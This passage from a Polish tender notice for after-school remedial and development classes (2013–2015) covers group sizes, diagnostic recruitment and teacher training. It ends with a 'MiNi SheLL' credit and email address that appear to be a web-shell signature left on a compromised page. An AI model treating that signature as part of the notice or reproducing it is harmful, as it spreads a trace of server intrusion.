t.	Zgłaszanie osobie nadzorującej zajęcia - osiągnięcie przez danego ucznia wymaganych umiejętności oraz progu zaliczeniowego w celu zakończenia udziału dziecka w projekcie,

Zajęcia będą odbywać się od października 2013 r. do 31 stycznia 2015 r. Grupa szkoleniowa będzie się składać z uczniów w liczbie od 6 do 8. W ramach zajęć Zamawiający dopuszcza możliwość utworzenia większej ilości grup i przeszkolenia większej ilości uczestników.
Rekrutacja będzie odbywać się przy pomocy systemu diagnostycznego, którego celem będzie sprawdzenie wiedzy (w zakresie zajęć dydaktyczno-wyrównawczych) oraz wiedzy i zainteresowań (w zakresie zajęć rozwojowych), łącznie 60 pytań. Dodatkowo bardzo znaczącą rolę w procesie dobrania optymalnego przedmiotu i rodzaju zajęć będzie miał nauczyciel. Na prowadzącym zajęcia spoczywać będzie również obowiązek zrekrutowania w danej szkole określonej ilości dzieci (6 - 8 uczniów na jedną grupę).
Wszyscy nauczyciele prowadzący zajęcia zostaną przeszkoleni w zakresie wdrożonych systemów informatycznych przy pomocy których edukowani będą uczniowie szkół objętych wsparciem.
Uczniowie objęci wsparciem będą uczyć się przy pomocy wdrożonych urządzeń i oprogramowania informatycznego (e-kursy dopasowane do poziomu ucznia) oraz w sposób niekonwencjonalny zaproponowany przez nauczyciela prowadzącego zajęcia (zgodne programem nauczania oraz wiedzą danego ucznia). W procesie prowadzenia zajęć nauczyciel będzie mógł korzystać z zakupionych na potrzeby projektu materiałów dydaktycznych.
Zamawiający zapewnia materiały dydaktyczne do prowadzenia zajęć, sale lekcyjne w godzinach pozalekcyjnych, sale do prowadzenia rekrutacji, sale do prowadzenia diagnozy ucznia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.01.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com